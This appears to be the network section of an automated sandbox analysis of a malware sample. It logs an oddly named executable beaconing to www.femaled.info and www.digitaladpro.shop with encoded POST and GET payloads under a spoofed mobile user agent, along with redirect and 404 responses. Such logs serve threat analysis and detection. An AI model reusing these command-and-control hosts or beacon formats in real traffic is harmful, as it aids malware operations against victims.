                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:12:51 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 273
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 31 42 53 48 75 3d 4f 42 56 78 47 68 38 50 55 54 66 6c 53 76 34 70 26 39 58 3d 61 72 4b 37 4f 49 48 51 57 48 67 74 44 68 31 73 66 33 6b 49 38 4a 2b 63 46 6d 52 2f 4a 6b 4c 62 55 67 69 50 43 49 67 4a 34 63 2b 77 6f 63 46 2b 79 44 6a 51 65 71 4f 53 39 74 32 47 61 74 4f 4f 46 31 63 63 33 57 4c 67 79 30 74 48 69 54 4f 4d 5a 64 46 51 7a 6e 6a 42 4d 63 50 61 6e 38 65 34 71 34 48 45 67 6b 65 73 55 4e 42 47 6c 6f 43 42 62 75 6f 5a 4b 43 55 44 37 7a 61 4c 6b 37 6b 66 73 67 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?1BSHu=OBVxGh8PUTflSv4p&9X=arK7OIHQWHgtDh1sf3kI8J+cFmR/JkLbUgiPCIgJ4c+wocF+yDjQeqOS9t2GatOOF1cc3WLgy0tHiTOMZdFQznjBMcPan8e4q4HEgkesUNBGloCBbuoZKCUD7zaLk7kfsg=="}</script></head></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          1192.168.2.549915142.250.186.115802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:06.626523972 CEST769OUTPOST /6lzj/ HTTP/1.1
                                                                                                                                                                          Host: www.femaled.info
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 203
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.femaled.info
                                                                                                                                                                          Referer: http://www.femaled.info/6lzj/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 38 43 41 41 2f 51 79 68 4e 70 6e 42 6f 56 2b 4f 54 31 6c 4f 43 71 7a 47 77 5a 2f 55 70 35 4a 4d 50 38 44 57 6f 4a 69 75 35 44 57 73 76 55 39 31 70 57 51 36 58 54 34 51 52 55 2f 6d 54 54 74 51 47 63 59 4e 6e 58 71 74 6c 55 75 45 6d 43 2b 44 78 52 79 6a 2f 36 30 4c 64 4d 77 77 70 33 2b 38 50 68 56 74 56 55 4f 72 58 34 58 6f 46 5a 41 52 48 69 4c 71 47 4f 51 75 6c 75 64 43 31 46 59 31 6f 5a 72 50 58 46 56 5a 53 71 39 51 57 75 36 4b 39 49 47 4e 55 65 41 47 78 6f 7a 2b 35 30 2f 2f 69 74 76 32 5a 59 36 68 37 67 45 56 4f 45 6b 43 57 33 7a 37 63 4a 55 68 73 33 6f 6a 50 6b 4f 62 49 79 6d 35 47 45 63 3d
                                                                                                                                                                          Data Ascii: 9X=8CAA/QyhNpnBoV+OT1lOCqzGwZ/Up5JMP8DWoJiu5DWsvU91pWQ6XT4QRU/mTTtQGcYNnXqtlUuEmC+DxRyj/60LdMwwp3+8PhVtVUOrX4XoFZARHiLqGOQuludC1FY1oZrPXFVZSq9QWu6K9IGNUeAGxoz+50//itv2ZY6h7gEVOEkCW3z7cJUhs3ojPkObIym5GEc=
                                                                                                                                                                          Oct 23, 2024 17:13:07.557369947 CEST402INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                          Content-Type: application/binary
                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:07 GMT
                                                                                                                                                                          Location: https://www.femaled.info/6lzj/
                                                                                                                                                                          Server: ESF
                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Connection: close


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          2192.168.2.549931142.250.186.115802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:09.167762995 CEST789OUTPOST /6lzj/ HTTP/1.1
                                                                                                                                                                          Host: www.femaled.info
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 223
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.femaled.info
                                                                                                                                                                          Referer: http://www.femaled.info/6lzj/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 38 43 41 41 2f 51 79 68 4e 70 6e 42 70 31 75 4f 52 53 4a 4f 4b 71 7a 46 2f 35 2f 55 6a 5a 49 46 50 37 4c 57 6f 4d 53 41 34 78 43 73 68 56 4e 31 71 54 77 36 57 54 34 51 65 45 2b 73 63 7a 73 53 47 63 63 76 6e 53 43 74 6c 55 36 45 6d 48 43 44 77 69 71 6b 77 4b 30 4e 57 73 77 32 71 48 2b 38 50 68 56 74 56 56 71 4e 58 34 50 6f 47 70 51 52 42 33 2f 70 4d 75 51 74 78 2b 64 43 6b 31 59 78 6f 5a 72 78 58 48 77 38 53 6f 46 51 57 73 79 4b 39 62 65 4f 44 75 41 45 73 59 79 4a 36 6d 6d 31 69 4d 48 59 51 65 4b 6d 75 41 59 70 50 79 56 6f 4d 56 37 54 50 70 34 5a 38 6b 67 55 65 55 76 79 53 52 32 4a 59 54 4a 42 4c 4d 78 61 35 49 67 55 4f 56 59 49 71 51 38 6d 71 63 4b 6c
                                                                                                                                                                          Data Ascii: 9X=8CAA/QyhNpnBp1uORSJOKqzF/5/UjZIFP7LWoMSA4xCshVN1qTw6WT4QeE+sczsSGccvnSCtlU6EmHCDwiqkwK0NWsw2qH+8PhVtVVqNX4PoGpQRB3/pMuQtx+dCk1YxoZrxXHw8SoFQWsyK9beODuAEsYyJ6mm1iMHYQeKmuAYpPyVoMV7TPp4Z8kgUeUvySR2JYTJBLMxa5IgUOVYIqQ8mqcKl
                                                                                                                                                                          Oct 23, 2024 17:13:10.104099035 CEST402INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                          Content-Type: application/binary
                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:09 GMT
                                                                                                                                                                          Location: https://www.femaled.info/6lzj/
                                                                                                                                                                          Server: ESF
                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Oct 23, 2024 17:13:11.206031084 CEST402INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                          Content-Type: application/binary
                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:09 GMT
                                                                                                                                                                          Location: https://www.femaled.info/6lzj/
                                                                                                                                                                          Server: ESF
                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Oct 23, 2024 17:13:11.206171036 CEST402INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                          Content-Type: application/binary
                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:09 GMT
                                                                                                                                                                          Location: https://www.femaled.info/6lzj/
                                                                                                                                                                          Server: ESF
                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Connection: close


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          3192.168.2.549939142.250.186.115802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:11.713888884 CEST1806OUTPOST /6lzj/ HTTP/1.1
                                                                                                                                                                          Host: www.femaled.info
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.femaled.info
                                                                                                                                                                          Referer: http://www.femaled.info/6lzj/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 38 43 41 41 2f 51 79 68 4e 70 6e 42 70 31 75 4f 52 53 4a 4f 4b 71 7a 46 2f 35 2f 55 6a 5a 49 46 50 37 4c 57 6f 4d 53 41 34 77 36 73 68 6d 56 31 6f 31 34 36 52 54 34 51 59 30 2b 74 63 7a 74 4b 47 59 77 72 6e 53 47 58 6c 57 43 45 6e 6c 61 44 33 54 71 6b 72 61 30 4e 5a 4d 77 7a 70 33 2f 2b 50 68 6c 70 56 55 61 4e 58 34 50 6f 47 73 55 52 51 69 4c 70 66 2b 51 75 6c 75 64 4f 31 46 59 5a 6f 64 50 68 58 48 6c 4a 53 34 6c 51 57 4d 43 4b 34 6f 36 4f 66 2b 41 43 76 59 79 52 36 6d 61 32 69 4d 4c 2b 51 61 44 7a 75 43 59 70 50 58 4e 31 5a 57 44 4d 4c 6f 6b 64 77 30 49 55 63 53 66 4a 5a 44 6e 35 48 52 5a 79 49 74 70 4f 76 66 64 53 4c 55 52 74 34 55 49 73 6c 37 79 73 78 6f 36 53 7a 47 61 42 42 36 57 55 4b 6e 43 4b 53 42 44 70 2b 55 74 43 79 75 66 2f 43 4b 32 77 78 58 73 77 4c 6c 32 70 68 51 6b 75 30 68 73 68 48 5a 79 57 70 51 6d 43 47 7a 70 63 4e 4b 4a 64 5a 44 59 4e 52 52 38 57 39 48 32 2b 6c 32 36 51 72 6d 64 74 62 48 39 6b 68 39 78 36 46 66 54 48 67 67 30 70 5a 34 56 2f 73 68 6b 78 62 57 4b 4c 50 67 70 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 9X=8CAA/QyhNpnBp1uORSJOKqzF/5/UjZIFP7LWoMSA4w6shmV1o146RT4QY0+tcztKGYwrnSGXlWCEnlaD3Tqkra0NZMwzp3/+PhlpVUaNX4PoGsURQiLpf+QuludO1FYZodPhXHlJS4lQWMCK4o6Of+ACvYyR6ma2iML+QaDzuCYpPXN1ZWDMLokdw0IUcSfJZDn5HRZyItpOvfdSLURt4UIsl7ysxo6SzGaBB6WUKnCKSBDp+UtCyuf/CK2wxXswLl2phQku0hshHZyWpQmCGzpcNKJdZDYNRR8W9H2+l26QrmdtbH9kh9x6FfTHgg0pZ4V/shkxbWKLPgp554MqY3sNZpSRd6wjdRfLtoVFiaKCNLX8zoU0lo+zl3LPGwmt8AWINYTR41MlJtl+oiIap8oiINeFhp0FkTl4xtwJMGMlNQinLQjSx6+XSTGuzzGoaoOzVnM+0nrBbqa7a3ItT+uuHtv0k9dQ8yGs+zTt+b+fb72An4UMUAU+gC81kavQOcDTmKa/MBGTEliabpDTYUULmIOTrIKmqafrW2Ge3hIayzJhwZtLh0/YITasOkrsDg91ScQoFmEU48OSGSaxmzhFD8jFj67b72ZzCKHSf40GtFHZ2eDhFdr4UUCsR/82R9j8DIKlJ5UYTPP7wgtyvhP39pVR41Bc5tlbB9tyDEAjMYGsXKIW80sb55aiiqX6tPUz7yxDGaab3M+0ljvvXtaRwRy4DfuYYm7tS9vq52TLtAFfuvqXdOa4nCWSqT/uPclPGgMOqTQJvIEuDijAoNGMqc1zlMEZrnbHNXX2HEbvAAuH7p2pMB43D4AeD9DgPRcgyQqDqvAhkRLd6yhDRBJ5L+ewJy1fY487K1TykaLVAQtTLjU7pyUwAUifAgBb1rMPF8NAlA7r90unHajdaaNPamXMghtHoHCo/xDHxW29sgrAOkqcmRWfz17HDzdhl2eN4yXLhEElT7A+S9GWlVduyO/ANkZYMAErQsrtRqUVE/ZtC [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:13:12.650151968 CEST402INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                          Content-Type: application/binary
                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:12 GMT
                                                                                                                                                                          Location: https://www.femaled.info/6lzj/
                                                                                                                                                                          Server: ESF
                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Connection: close


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          4192.168.2.549953142.250.186.115802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:14.255765915 CEST520OUTGET /6lzj/?9X=xAog8lu6Eu7QtFn4XzpwK636jvz7h/RiPL6Mqd+tn3LhinkNlGJ/IgptFmyDalBvSo4ysHuuqGyYnVLY/iOj/oM6bcsKlVS4THtoYGTMNZH5M+UIQXTFDbo/ztpf13hKpQ==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1
                                                                                                                                                                          Host: www.femaled.info
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Oct 23, 2024 17:13:15.303634882 CEST565INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                          Content-Type: application/binary
                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:15 GMT
                                                                                                                                                                          Location: https://www.femaled.info/6lzj/?9X=xAog8lu6Eu7QtFn4XzpwK636jvz7h/RiPL6Mqd+tn3LhinkNlGJ/IgptFmyDalBvSo4ysHuuqGyYnVLY/iOj/oM6bcsKlVS4THtoYGTMNZH5M+UIQXTFDbo/ztpf13hKpQ%3D%3D&1BSHu=OBVxGh8PUTflSv4p
                                                                                                                                                                          Server: ESF
                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          Connection: close


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          5192.168.2.549982142.250.184.211802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:20.462335110 CEST784OUTPOST /ggfl/ HTTP/1.1
                                                                                                                                                                          Host: www.digitaladpro.shop
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 203
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.digitaladpro.shop
                                                                                                                                                                          Referer: http://www.digitaladpro.shop/ggfl/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 76 4d 61 72 71 69 41 6e 50 65 4c 56 6a 2f 55 38 48 69 4f 62 32 65 63 2b 6e 32 41 41 56 52 64 39 44 4e 55 78 4b 6d 32 43 68 46 50 4f 6b 37 69 37 71 39 74 55 35 70 31 55 6b 4e 4d 52 66 71 47 6d 30 72 66 6f 54 79 34 51 45 47 4f 57 51 76 76 38 4e 47 4f 4f 67 4d 70 70 70 2b 68 67 62 44 6a 58 66 79 47 39 76 47 2f 50 2b 50 58 4a 79 32 4f 50 6c 33 36 48 6a 70 4f 44 7a 53 41 6e 6a 47 42 54 72 73 52 35 33 56 2b 37 48 51 58 6f 55 79 79 56 72 35 6e 61 45 73 61 4a 49 61 71 49 6b 49 43 6f 67 56 35 67 73 4d 62 72 2b 36 59 6d 61 49 49 66 30 6d 30 56 4f 77 4b 41 75 50 52 6c 53 69 6b 53 4f 64 41 75 39 37 77 3d
                                                                                                                                                                          Data Ascii: 9X=vMarqiAnPeLVj/U8HiOb2ec+n2AAVRd9DNUxKm2ChFPOk7i7q9tU5p1UkNMRfqGm0rfoTy4QEGOWQvv8NGOOgMppp+hgbDjXfyG9vG/P+PXJy2OPl36HjpODzSAnjGBTrsR53V+7HQXoUyyVr5naEsaJIaqIkICogV5gsMbr+6YmaIIf0m0VOwKAuPRlSikSOdAu97w=
                                                                                                                                                                          Oct 23, 2024 17:13:21.315284014 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:21 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Server: ghs
                                                                                                                                                                          Content-Length: 1566
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:13:21.315402031 CEST537INData Raw: 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d
                                                                                                                                                                          Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          6192.168.2.549983142.250.184.211802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:13:23.010222912 CEST804OUTPOST /ggfl/ HTTP/1.1
                                                                                                                                                                          Host: www.digitaladpro.shop
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 223
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.digitaladpro.shop
                                                                                                                                                                          Referer: http://www.digitaladpro.shop/ggfl/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 76 4d 61 72 71 69 41 6e 50 65 4c 56 78 50 6b 38 46 46 69 62 78 2b 63 35 37 47 41 41 66 78 64 35 44 4e 59 78 4b 6b 47 53 67 33 62 4f 6c 61 53 37 72 2f 56 55 36 70 31 55 73 74 4d 55 52 4b 48 6f 30 72 53 4c 54 33 41 51 45 46 79 57 51 71 54 38 4e 55 6d 4e 78 4d 70 72 76 2b 68 69 66 44 6a 58 66 79 47 39 76 47 72 68 2b 4f 2f 4a 79 48 2b 50 6c 57 36 45 39 35 4f 43 6c 43 41 6e 79 57 42 66 72 73 51 63 33 55 7a 65 48 53 66 6f 55 79 43 56 79 4c 50 56 50 73 61 44 48 36 72 41 6e 35 2f 54 70 6d 52 68 77 61 75 4f 6d 4c 45 66 53 65 35 31 75 45 38 39 64 51 6d 34 2b 63 5a 53 44 53 46 37 55 2b 51 65 6a 73 6d 32 6e 2f 65 36 71 47 55 52 61 64 59 73 76 52 37 33 61 52 37 72
                                                                                                                                                                          Data Ascii: 9X=vMarqiAnPeLVxPk8FFibx+c57GAAfxd5DNYxKkGSg3bOlaS7r/VU6p1UstMURKHo0rSLT3AQEFyWQqT8NUmNxMprv+hifDjXfyG9vGrh+O/JyH+PlW6E95OClCAnyWBfrsQc3UzeHSfoUyCVyLPVPsaDH6rAn5/TpmRhwauOmLEfSe51uE89dQm4+cZSDSF7U+Qejsm2n/e6qGURadYsvR73aR7r
                                                                                                                                                                          Oct 23, 2024 17:13:23.848776102 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:13:23 GMT
                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Server: ghs
                                                                                                                                                                          Content-Length: 1566
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
